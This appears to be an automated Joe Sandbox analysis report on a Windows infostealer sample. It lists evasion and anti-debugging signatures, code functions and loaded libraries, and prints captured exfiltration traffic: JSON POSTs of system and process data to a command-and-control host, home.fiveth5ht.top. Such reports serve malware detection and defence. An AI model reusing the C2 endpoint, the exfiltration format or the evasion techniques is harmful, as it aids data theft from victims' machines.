Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PqHnYMj5eF.exe

Overview

General Information

Sample name:PqHnYMj5eF.exe
renamed because original name is a hash value
Original sample name:5a249494869b3ef440bd31b438958585.exe
Analysis ID:1581243
MD5:5a249494869b3ef440bd31b438958585
SHA1:d3c4cfbca5b8b1d061ac2f55899dfefc49321cff
SHA256:0783ed26022f0e0f99d7e6b72ee2d7d7372c97596249299275cc19db7b10a8c4
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PqHnYMj5eF.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\PqHnYMj5eF.exe" MD5: 5A249494869B3EF440BD31B438958585)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: PqHnYMj5eF.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: PqHnYMj5eF.exeReversingLabs: Detection: 47%
Source: PqHnYMj5eF.exeVirustotal: Detection: 32%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: PqHnYMj5eF.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: -----BEGIN PUBLIC KEY-----0_2_003EDCF0
Source: PqHnYMj5eF.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0042A5B0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0042B560
Source: PqHnYMj5eF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003C255D
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003C29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 499951Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 35 35 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 209Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0048A8C0 recvfrom,0_2_0048A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 499951Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 35 35 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494057055.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494057055.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseiN
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: PqHnYMj5eF.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: PqHnYMj5eF.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: PqHnYMj5eF.exe, PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: PqHnYMj5eF.exeStatic PE information: section name:
Source: PqHnYMj5eF.exeStatic PE information: section name: .idata
Source: PqHnYMj5eF.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_3_0184CF210_3_0184CF21
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_3_018341E10_3_018341E1
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003D05B00_2_003D05B0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003D6FA00_2_003D6FA0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003FF1000_2_003FF100
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0048B1800_2_0048B180
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0074E0500_2_0074E050
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0074A0000_2_0074A000
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_004900E00_2_004900E0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_004262100_2_00426210
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0048C3200_2_0048C320
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007144100_2_00714410
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_004904200_2_00490420
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003CE6200_2_003CE620
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0048C7700_2_0048C770
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007267300_2_00726730
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0042A7F00_2_0042A7F0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007447800_2_00744780
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0047C9000_2_0047C900
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003CA9600_2_003CA960
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003D49400_2_003D4940
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00596AC00_2_00596AC0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0067AAC00_2_0067AAC0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00554B600_2_00554B60
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0067AB2C0_2_0067AB2C
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00738BF00_2_00738BF0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003CCBB00_2_003CCBB0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0074CC900_2_0074CC90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00744D400_2_00744D40
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00580D800_2_00580D80
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0073CD800_2_0073CD80
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_006DAE300_2_006DAE30
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003E4F700_2_003E4F70
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0048EF900_2_0048EF90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00488F900_2_00488F90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00712F900_2_00712F90
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003D10E60_2_003D10E6
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_0072D4300_2_0072D430
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007335B00_2_007335B0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007517A00_2_007517A0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_004798800_2_00479880
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_007199200_2_00719920
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00743A700_2_00743A70
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00401BE00_2_00401BE0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00731BD00_2_00731BD0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00727CC00_2_00727CC0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_00679C800_2_00679C80
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003D5DB00_2_003D5DB0
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_3_0185368B0_3_0185368B
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 00577220 appears 101 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 00404FD0 appears 259 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003CC960 appears 36 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 004A44A0 appears 72 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003C71E0 appears 47 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003CCAA0 appears 63 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 0059CBC0 appears 101 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 004050A0 appears 91 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003C73F0 appears 110 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003DCD40 appears 78 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 00405340 appears 50 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 00404F40 appears 327 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003C75A0 appears 654 times
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: String function: 003DCCD0 appears 54 times
Source: PqHnYMj5eF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: PqHnYMj5eF.exeStatic PE information: Section: qmfawksx ZLIB complexity 0.9945058078326783
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003C255D
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeCode function: 0_2_003C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003C29FF
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: PqHnYMj5eF.exeReversingLabs: Detection: 47%
Source: PqHnYMj5eF.exeVirustotal: Detection: 32%
Source: PqHnYMj5eF.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: PqHnYMj5eF.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeSection loaded: mswsock.dllJump to behavior
